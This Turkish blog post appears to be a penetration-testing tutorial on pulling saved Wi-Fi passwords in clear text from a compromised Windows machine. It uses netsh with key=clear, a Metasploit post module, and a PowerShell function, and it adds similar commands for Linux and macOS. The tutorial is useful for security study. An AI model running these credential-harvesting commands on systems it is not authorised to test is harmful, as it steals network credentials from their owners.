Komut Satırı Ele Geçirilen Windows Bilgisayardan Kayıtlı Kablosuz Ağ Erişim Bilgilerinin Elde Edilmesi

0
334
views
Sızma testleri sırasında Windows komut satırı erişimi sağlanmış bir bilgisayar üzerinde kritik bilgi elde edilmeye çalışılır. Bu yazıda, kullanıcının kaydettiği kablosuz ağ profillerine ait kimlik bilgileri ele geçirilen Windows komut satırı üzerinden edilecektir.

Kullanıcılar kablosuz ağlara bağlanırken her defasında parola girmemek amacıyla, kablosuz ağ erişim bilgilerini işletim sistemi üzerinde kaydederler. Böylece hızlı bir şekilde kablosuz ağa erişim sağlayabilirler. Ancak bu durum kötüye kullanılabilir ve kayıtlı bu bilgiler ele geçirilebilir. Bu amaçla Windows’un standart komutlarından olan netsh aracı kullanılabilir.

netsh
wlan ?

acquiring-authentication-informations-for-wireless-connections-on-windows-command-line-by-using-netsh-tool-01

Mevcut profiller listelenir.

wlan
show profile

acquiring-authentication-informations-for-wireless-connections-on-windows-command-line-by-using-netsh-tool-02

Bu profiller disk sistemi üzerinde C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\<ArayuzId> dizini altında kayıtlıdır.

acquiring-authentication-informations-for-wireless-connections-on-windows-command-line-by-using-netsh-tool-03

Erişim bilgileri ele geçirilmek istenen profil adı seçilir ve incelenir.

show profile name=”Modemim”

acquiring-authentication-informations-for-wireless-connections-on-windows-command-line-by-using-netsh-tool-04

Disk sistemi üzerinden ilgili dosya incelendiğinde profiller ile ilgili benzer bilgilere erişim sağlanabilmektedir. Ancak parolanın korumalı (protected) olduğu görülmektedir.

acquiring-authentication-informations-for-wireless-connections-on-windows-command-line-by-using-netsh-tool-05

 

Not: Kablosuz ağ parolaları, Data Protection API (DPAPI) ile şifreli olarak kaydedilmektedir. Bir kullanıcı veya LocalSystem tarafından bu bilgilere erişim sağlanabilir.

 

Parolanın açık halini elde edebilmek için netsh aracı kullanılabilir.

show profile name=”Modemim” key=clear

acquiring-authentication-informations-for-wireless-connections-on-windows-command-line-by-using-netsh-tool-06

Tek bir satırda parolayı elde etmek için aşağıdaki komut kullanılabilir.

netsh wlan show profile name=”Modemim” key=clear

acquiring-authentication-informations-for-wireless-connections-on-windows-command-line-by-using-netsh-tool-07

 

Not: Meterpreter bağlantısının elde edilmesi durumunda, MSF wlan_profile post modülü ile de aynı kimlik bilgileri elde edilebilir.

use post/windows/wlan/wlan_profile
set session X
exploit

 

Not: netsh.exe kullanmadan Powershell Get-WiFiProfile fonksiyonu [i] kullanılarak da parola açık metin olarak elde edilebilir.

Get-WiFiProfile -ProfileName TestWiFi -ClearKey

 

Not: Linux ve MacOS işletim sistemleri için ise aşağıdaki komutlar kullanılabilir.

cat /etc/NetworkManager/system-connections/”Modemim”

security find-generic-password -ga “Modemim”

 

 

Kaynaklar:
[i] https://github.com/jcwalker/WiFiProfileManagement

View passwords of wireless profiles without using netsh.exe

 

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

This site uses Akismet to reduce spam. Learn how your comment data is processed.